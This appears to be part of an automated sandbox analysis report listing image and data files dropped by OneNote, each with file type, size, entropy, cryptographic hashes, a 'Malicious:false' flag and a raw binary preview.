                                                                                                                                                                                                              Entropy (8bit):7.79401348966645
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                                                                                                                              MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                                                                                                                              SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                                                                                                                              SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                                                                                                                              SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3361
                                                                                                                                                                                                              Entropy (8bit):7.619405839796034
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                                                                                                                              MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                                                                                                                              SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                                                                                                                              SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                                                                                                                              SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.352141138224157
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:asoclZdFxZEMcX4c9iJcRQyPIYA7H767Zt7U7HaR7S7:asoc7dFsJXN9iJcRJPvA7H767Zt7U7Hz
                                                                                                                                                                                                              MD5:25F4419591CA294FA1583DB8D7F1E7A0
                                                                                                                                                                                                              SHA1:947B73D1B2A34244CBF04093DB61F4268AD02252
                                                                                                                                                                                                              SHA-256:83BAAECAD24753533B808875AC415683CC777291551A51690C0FC4A4B5DAB66C
                                                                                                                                                                                                              SHA-512:1DAE103801EE08B6948347B5AD273243E6D28C5C7F8A50A2E96EADF65D99CBF40121A73246E727F8299ECDD8F20B07942A40D1593C995EDB3F6B32CF6B747139
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.n=......n=.V...#!.)gn.q.n=.V...#!.)gn.q.n=..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................*,...%<ImN%......N...^...............:...(.cO....lr..........f........................................I.qk..B.....LZ...............*,...%<ImN%.............*,...%<ImN%............n=......n=......n=..........................................n=j.....n=T.]...n=......n=..B...n=H.....n=..B...n=..>.).n=..J...................;........4...4...4.."...............n=..n=..n=..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........n=......n=....#.n=............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):140755
                                                                                                                                                                                                              Entropy (8bit):7.9013245181576695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                                                                                                                              MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                                                                                                                              SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                                                                                                                              SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                                                                                                                              SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.319736271510745
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuTysN/Amf5tnsrzEuVL4XrNi9aVM6ohrdQqrzEBgyBXTl7mKhx:Ypsmmf5Js/EuV8XrM9u/gRQyCDvh
                                                                                                                                                                                                              MD5:9CBE7B3B385B1B07499AA0136673720A
                                                                                                                                                                                                              SHA1:1A0A36441EC437E9021BC87991C5E5949AE8DB85
                                                                                                                                                                                                              SHA-256:18FFF4BF523F6763D4959D51F7F0465266A2CA49FC79A7D5632C799558229EB1
                                                                                                                                                                                                              SHA-512:08322D0390BC7AB5BA024AFEAABECE46F9B3A117E6BF96D38744A3D6AD0ACBC392CB496089E8D3BA38C780521206CDB81F40357C44BC1CAAB747DC3F74A41893
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ..*.......*.Y... #....D..*.Y... #....D..*..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............3?WW....&L~Y......N...^................*.Az.B.#.#J..0........f........................................I.qk..B.....LZ..............3?WW....&L~Y............3?WW....&L~Y.............*.......*.......*...........................................*j......*T.]....*.......*..B....*H......*..B....*..>.)..*..J...................;........4...4...4.."................*...*...*..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........*.......*....#..*............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):129887
                                                                                                                                                                                                              Entropy (8bit):7.8877849553452695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                                                                                                                              MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                                                                                                                              SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                                                                                                                              SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                                                                                                                              SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.2366178649884905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Y5sSzCcl9FGXEr7dX49ydwRQyB4NCYjFY:Ks4lnr7dX49ydwRJB4
                                                                                                                                                                                                              MD5:25F70A7E5B6CF4725C7F88DD947534BD
                                                                                                                                                                                                              SHA1:75D2B3BCA7585E4B59314C67080D5544F3F27F5A
                                                                                                                                                                                                              SHA-256:06D4953FBD90FFDD3D45F7E99B229E1560BB95CFC1D2654A1496508597BD0E30
                                                                                                                                                                                                              SHA-512:7E5C55C7F71AAEED762F600A9E133DE0490F982DBFB1F4D4513A5D7242C15C6C28C3D84DBD714320C0118F6E06E1A7D23C4572A4C0A194025652F864EA39C807
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ..7.......7......Rc.W.N...7......Rc.W.N...7..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.......................)".mx4....N...^.............../aM.jT%F..E.n.U>........f........................................I.qk..B.....LZ......................)".mx4..................)".mx4...........7.......7.......7...........................................7j......7T.]....7.......7..B....7H......7..B....7..>.)..7..J...................;........4...4...4.."................7...7...7..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4...........7.......7....#..7............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84941
                                                                                                                                                                                                              Entropy (8bit):7.966881945560921
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                                                                                                                              MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                                                                                                                              SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                                                                                                                              SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                                                                                                                              SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.328998915543244
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YuCs194UJ2G7tekEe+hlXQ9t82oFrdQqrjxbP2BXUpvb2G/yDgvB8CL:YVszsG7NEPvXQ9y2cRQyFqays
                                                                                                                                                                                                              MD5:0055D96B2B151CF22ED1113ACD3DE712
                                                                                                                                                                                                              SHA1:D7E07AEF238C8E33AF5AE352F682AD453BE2FC6B
                                                                                                                                                                                                              SHA-256:696137E88257542F6BC8CB69AFF9C8D8A0FF6EA89054E349669A0BF1B122810E
                                                                                                                                                                                                              SHA-512:DFE504D705F627B04D84A54BA5365D4A0B50DA5644DA136663B9A5B4CF756073A9BEFD3A0E3116135EB423BD32C9A45963044D26769E65D84865824992B52A1A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ...........p.9#.<P..e./....p.9#.<P..e./......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............IG(.x..6....A.....N...^......................G..fnb..!........f........................................I.qk..B.....LZ.............IG(.x..6....A..........IG(.x..6....A.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1569
                                                                                                                                                                                                              Entropy (8bit):7.583832946136897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                                                                                                                              MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                                                                                                                              SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                                                                                                                              SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                                                                                                                              SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.382193944365998
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:5CsrjrMFCHa0JataQE+YlLGXBFP49SVKo9rdQqrvIQwBXib1eT94tDc7eYq1I:gs4FCHa2a1EplKXBFP49SVKkRQygQwl
                                                                                                                                                                                                              MD5:F5DE2D3406E0AE946BB4E111C686C54C
                                                                                                                                                                                                              SHA1:475FB18BA7698122FC7B56AA5AE9FCE7D8F4E3E6
                                                                                                                                                                                                              SHA-256:BE1670482333ECBFD9A5873FE95AF648E5426586F866F6FEABD02C328F4DB24C
                                                                                                                                                                                                              SHA-512:3B2D11FE3A873DC5E25436329FD97329734E9CEB806FE5D08917CC8D07896B1DE7F811E65984B9E051DF8D6BB3AAD9CA90CC28A353B2E5FCA9E97C55EC90CA40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ&.......&..?.-......K1e&..?.-......K1e&....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6z.Y....?K..sl.R....N...^.................u.nHK......q........f........................................I.qk..B.....LZ............6z.Y....?K..sl.R........6z.Y....?K..sl.R.........&.......&.......&...........................................&..j....&..T.]..&.......&....B..&..H....&....B..&....>.)&....J...................;........4...4...4.."..............&...&...&....z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........&.......&......#&..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40035
                                                                                                                                                                                                              Entropy (8bit):7.360144465307449
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                                                                                                                              MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                                                                                                                              SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                                                                                                                              SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                                                                                                                              SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.631487726753683
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:hszNy2Z+1rpwH5E3/DX6ZC9eVd0RQyAPBRluBrEk:hsRy2Erpl3/DXB9ef0RJAPBRluBgk
                                                                                                                                                                                                              MD5:76586F74C3E8BD7227406AD800B52E25
                                                                                                                                                                                                              SHA1:763353374E0B11A74362A98BE47DBF316212A2DE
                                                                                                                                                                                                              SHA-256:32007D1387C9A5FBBF6AFD7FED41230E8BAC0105153638E470CD0FCFB1C01EEA
                                                                                                                                                                                                              SHA-512:2ECC37F2BCB27C1D890F2F964AFED11E0852DE30D26B4C252BFA3A82247502D7AB42101A4F6EFE5BD61EE20ADC6B01C76A52AE0A69EC42ED48D9E08CB6B53AF2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v...~...................................................................................................................................2...>...f.......v................................I.......I.qk..B.....LZg.w.....g.w[-.....*.r.&.g.w[-.....*.r.&.g.w..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................$8m.:..j....N...^....................'C..s..".........f...................................:....I.qk..B.....LZ....................$8m.:..j................$8m.:..j.........g.w.....g.w.....g.w.........................................g.wj....g.wT.]..g.w.....g.w..B..g.wH....g.w..B..g.w..>.)g.w..J...................;........4...4...4.."..............g.w.g.w.g.w..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........g.w.....g.w....#g.w............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):242903
                                                                                                                                                                                                              Entropy (8bit):7.944495275553473
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                                                                                                                              MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                                                                                                                              SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                                                                                                                              SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                                                                                                                              SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.313722090236628
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:YJs4z/6uuSyeD2EXMRoWXfBW9KCMRQyqE9TgW9LUU:yso/6uuSbDTXMRpXf89KCMRJq
                                                                                                                                                                                                              MD5:52E2335F5AFF950A48519A0600757345
                                                                                                                                                                                                              SHA1:CAC913A31E13FD6514C0A4F96FD2302982E92377
                                                                                                                                                                                                              SHA-256:7E4776078DB8A8F74CBABD267057861FAD624EE824DCAC20E8498FB335987606
                                                                                                                                                                                                              SHA-512:C831836AA9CA6DE9333AE3EA021B76EB4497F8D1553D4FD64E41F89BE01D7A0DACD1B593B5DC0038E5AAB84B5800882314D492618406098EF0B0AE3130A7B9C4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.ev......evB.....C.@79B .evB.....C.@79B .ev..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Q.h.).?.$....z......N...^................;P....F.y@.>.{.........f........................................I.qk..B.....LZ............Q.h.).?.$....z..........Q.h.).?.$....z............ev......ev......ev..........................................evj.....evT.]...ev......ev..B...evH.....ev..B...ev..>.).ev..J...................;........4...4...4.."...............ev..ev..ev..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........ev......ev....#.ev............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):70028
                                                                                                                                                                                                              Entropy (8bit):7.742089280742944
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                                                                                                                              MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                                                                                                                              SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                                                                                                                              SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                                                                                                                              SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                                                                                                                              Malicious:false
